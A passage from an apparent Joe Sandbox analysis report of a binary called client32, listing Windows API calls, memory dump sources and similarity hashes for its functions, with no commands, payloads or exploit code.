  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
• SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
• MessageBeep.USER32(00000000), ref: 1103D25E
Strings
• Show has overrun too much, aborting, xrefs: 1103D1F1
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
• String ID: Show has overrun too much, aborting
• API String ID: 304545663-4092325870
• Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
• Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
• Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
• Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
APIs
• GetDlgItem.USER32(?,?), ref: 1101D3EB
• EnableWindow.USER32(00000000,?), ref: 1101D3F6
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
• API String ID: 1136984157-1986719024
• Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
• Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
• Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
• Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EnumExitSleepThreadWindows
• String ID: TapiFix
• API String ID: 1804117399-2824097521
• Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
• Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
• Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
• Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
APIs
• GetDlgItem.USER32(?,?), ref: 1101D43F
• ShowWindow.USER32(00000000), ref: 1101D446
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
• API String ID: 1319256379-1986719024
• Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
• Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
• Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
• Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
• Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
• Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
• Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
APIs
• MessageBeep.USER32(00000000), ref: 1106791B
• MessageBeep.USER32(00000000), ref: 11067957
• MessageBeep.USER32(00000000), ref: 110679AA
• MessageBeep.USER32(00000000), ref: 110679EB
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: BeepMessage
• String ID:
• API String ID: 2359647504-0
• Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
• Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
• Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
• Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
APIs
  • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
  • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
• _malloc.LIBCMT ref: 110491DD
• _memmove.LIBCMT ref: 110491EA
• SendMessageTimeoutA.USER32(?,0000004A,000A0036,?,00000002,00001388,?), ref: 11049224
• _free.LIBCMT ref: 1104922B
  • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
  • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
  • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 176360892-0
                                                                                                                                                    • Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                                                                                    • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                                                                                                    • Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                                                                                    • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
APIs
  • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
  • Part of subcall function 6CA9DBD0: wsprintfA.USER32 ref: 6CA9DC04
  • Part of subcall function 6CA9DBD0: _memset.LIBCMT ref: 6CA9DC27
• std::exception::exception.LIBCMT ref: 6CA8CCCD
• __CxxThrowException@8.LIBCMT ref: 6CA8CCE2
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID:
• API String ID: 1338273076-0
• Opcode ID: b172729f3f23dca40d738fca8b95193ad4aa528bd4f6c1796e62af2aa657e95f
• Instruction ID: 13c9db7bf374a68fd740e7fafec47c67d3e3cf02e380e0eaae4160e28e00693f
• Opcode Fuzzy Hash: b172729f3f23dca40d738fca8b95193ad4aa528bd4f6c1796e62af2aa657e95f
• Instruction Fuzzy Hash: 133150B59107089FC718DF59D54189BF7F8FF48204B148A6ED85A97B20EB70ED48CB91

APIs
• CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
• Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
• PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
• Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: SleepThread$CreateMessagePost
• String ID:
• API String ID: 3347742789-0
• Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
• Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
• Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
• Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
• __isleadbyte_l.LIBCMT ref: 111797DC
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
• Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
• Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
• Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51

APIs
• EnterCriticalSection.KERNEL32(0000002C,1EF76653,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
• LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
• SetEvent.KERNEL32(?), ref: 110B37EA
• LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$EnterEvent
• String ID:
• API String ID: 3394196147-0
• Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
• Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
• Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
• Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,1EF76653,00000000,00002710,00000001,11027140,1EF76653,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                                                                                                    • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 110436DE
                                                                                                                                                    • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$CriticalEnterLongMessageRectSectionSend
• String ID:
• API String ID: 3558565530-0
• Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
• Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
• Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
• Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
APIs
• SetBkColor.GDI32(?,?), ref: 11143091
• SetRect.USER32(?,?,?,?,?), ref: 111430A9
• ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
• SetBkColor.GDI32(?,00000000), ref: 111430C8
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Color$RectText
• String ID:
• API String ID: 4034337308-0
• Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
• Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
• Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
• Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
APIs
• SetEvent.KERNEL32 ref: 110675BB
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
• DispatchMessageA.USER32(?), ref: 110675F6
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$Peek$DispatchEvent
• String ID:
• API String ID: 4257095537-0
• Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
• Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
• Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
• Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
APIs
• GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
• GlobalDeleteAtom.KERNEL32 ref: 1115F212
• GlobalDeleteAtom.KERNEL32 ref: 1115F21C
• SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AtomDeleteGlobal$LongWindow
• String ID:
• API String ID: 964255742-0
• Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
• Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
• Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
• Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
• SetFocus.USER32(?), ref: 11007403
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 1305092643-2167791130
                                                                                                                                                    • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                                                                                    • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                                                                                    • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                                                                                    • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
APIs
  • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
  • Part of subcall function 6CA9DBD0: wsprintfA.USER32 ref: 6CA9DC04
  • Part of subcall function 6CA9DBD0: _memset.LIBCMT ref: 6CA9DC27
• std::exception::exception.LIBCMT ref: 6CA90EEB
• __CxxThrowException@8.LIBCMT ref: 6CA90F00
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID: PIN
• API String ID: 1338273076-589459321
• Opcode ID: 2bf39442b82258e71c14be8754ce83d554c24df6912f7205e0c7fd34f63aeba1
• Instruction ID: 2bee7cec8cc4ce0df8a7804de34dd1ffe59598e9cd93023ca10a9aaff1788a4e
• Opcode Fuzzy Hash: 2bf39442b82258e71c14be8754ce83d554c24df6912f7205e0c7fd34f63aeba1
• Instruction Fuzzy Hash: 21413CB1D10248AFDB04DFE8D9819EEBBF4FB49304F10462EE41AE7640EB345A89CB51
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 110092E5
• _memmove.LIBCMT ref: 11009336
  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
